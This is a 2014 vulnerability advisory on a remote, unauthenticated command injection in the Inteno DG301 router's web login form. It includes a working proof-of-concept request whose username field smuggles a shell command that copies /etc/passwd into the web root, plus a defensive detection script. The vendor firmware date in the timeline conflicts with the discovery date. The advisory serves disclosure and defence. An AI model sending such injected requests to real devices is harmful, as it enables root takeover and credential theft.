
Inteno DG301 Command Injection

Posted Feb 4, 2014
Authored by Juan J. Guelfo | Site encripto.no

Inteno DG301 routers are susceptible to a remote command injection vulnerability. Proof of concept included.

tags | exploit, remote, proof of concept
SHA-256 | 8b76e6779429975b9c369e86d1e0d8e31af365096fd2ecc0ca1dcc4883d30e25

1. Background

According to the vendor, Inteno DG301 is a high-end Multi-WAN
residential gateway with advanced router and bridge functions.


2. Summary

Inteno DG301 Powered by LuCI Trunk (inteno-1.0.34) and OpenWrt Backfire
10.03.1-RC6 is vulnerable to command injection, which can be exploited
directly from the login form on the web interface.

The vulnerability could be exploited by unauthenticated attackers.
Successful exploitation would allow attackers to execute arbitrary
commands with root privileges.


3. Affected Products

DG301 Powered by LuCI Trunk (inteno-1.0.34) and OpenWrt Backfire
10.03.1-RC6.
Other products or previous versions may also be vulnerable.


4. Vulnerability and Proof of Concept (PoC)

The login form presented on the web administration interface (username
parameter) is vulnerable to command injection, because the application
does not properly validate user input.

The following PoC includes a POST request that should be sent to the
device's web interface. The request includes a command that will copy the
contents of "/etc/passwd" to a file "test.txt" in the root web folder
where the web administration interface is published.

POST /cgi-bin/luci HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 Gecko/20100101 Firefox
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sysauth=55f19d843ebf2de094b8a8a2acf5c3a7; sysauth=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

username=user`cp%20/etc/passwd%20/www/test.txt`&password=pass

After the request is sent, proceed to visit http://<routerIP>/test.txt.
This should display the contents of "/etc/passwd", including the root
password in encrypted (DES) form. From here, the root credentials could
be cracked in a reasonable amount of time. This attack could also be
used for enabling services (e.g. SSH), or running any other arbitrary
commands.
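
A defensive check for the flaw described above, as an added example that is not part of the original advisory: it decodes POST bodies sent to /cgi-bin/luci and flags username values carrying shell metacharacters or falling outside an allowlist. The allowlist pattern, the function names and the sample records are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Characters and sequences a POSIX shell treats as command substitution,
# chaining or redirection; none of them belong in a login name.
SHELL_META = re.compile(r"[`;|&<>\n\r]|\$\(|\$\{")
# Conservative allowlist for a login name (assumption, adjust to local policy).
VALID_USERNAME = re.compile(r"^[A-Za-z0-9_.@-]{1,32}$")

def inspect_login_body(body: str) -> dict:
    """Decode an x-www-form-urlencoded login body and classify the username."""
    fields = parse_qs(body, keep_blank_values=True)
    usernames = fields.get("username", [])
    findings = []
    for name in usernames:
        if SHELL_META.search(name):
            findings.append("shell-metacharacter")
        elif not VALID_USERNAME.match(name):
            findings.append("outside-allowlist")
    if len(usernames) > 1:
        findings.append("duplicate-parameter")
    return {"usernames": usernames, "findings": findings,
            "suspicious": bool(findings)}

def scan(records):
    """records: iterable of (method, path, body); return the flagged ones."""
    hits = []
    for method, path, body in records:
        if method == "POST" and path.split("?")[0] == "/cgi-bin/luci":
            result = inspect_login_body(body)
            if result["suspicious"]:
                hits.append((path, result))
    return hits

# Constructed sample traffic; the second body is the one shown in the advisory.
SAMPLE = [
    ("POST", "/cgi-bin/luci", "username=admin&password=secret"),
    ("POST", "/cgi-bin/luci",
     "username=user`cp%20/etc/passwd%20/www/test.txt`&password=pass"),
    ("POST", "/cgi-bin/luci", "username=a%24%28id%29&password=x"),
    ("GET", "/cgi-bin/luci", ""),
]

if __name__ == "__main__":
    for path, result in scan(SAMPLE):
        print(path, result["findings"], result["usernames"])
```

The same allowlist, applied server-side before the username reaches any shell invocation, is the input validation the advisory says was missing; traffic inspection only covers devices that cannot yet be updated.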


5. Remediation

The vendor has released a new firmware version - 1.6.8RC3.
Users are encouraged to update their devices in order to patch the
vulnerability.


6. Credit

The vulnerability was originally discovered in an Inteno DG301 device,
by Juan J. Güelfo at Encripto AS.
E-mail: post@encripto.no
Web: http://www.encripto.no

For more information about Encripto's research policy, please visit
http://www.encripto.no/forskning/


7. Timeline

24th of January 2014 - Vulnerabilities discovered by the researcher.
26th of January 2014 - Vulnerability details disclosed to the vendor.
31st of January 2013 - New firmware version launched by the vendor,
which addresses the vulnerability.
3rd of February 2014 - Public disclosure.


8. References

http://www.encripto.no/forskning/whitepapers/Inteno_DG301_advisory_feb_2014.pdf


DISCLAIMER

The material presented in this document is for educational purposes
only. Encripto AS cannot be responsible for any loss or damage carried
out by any technique presented in this material. The reader is the only
one responsible for applying this knowledge, which is at his / her own
risk.
Any of the trademarks, service marks, collective marks, design rights,
personality rights or similar rights that are mentioned, used or cited
in this document is property of their respective owners.



Kind regards
*Juan J. Guelfo*

Encripto AS - Information Security

Mailbox 2017, 6028 Aalesund, Norway.
Phone: +47 912 40 380 | www.encripto.no <http://www.encripto.no>
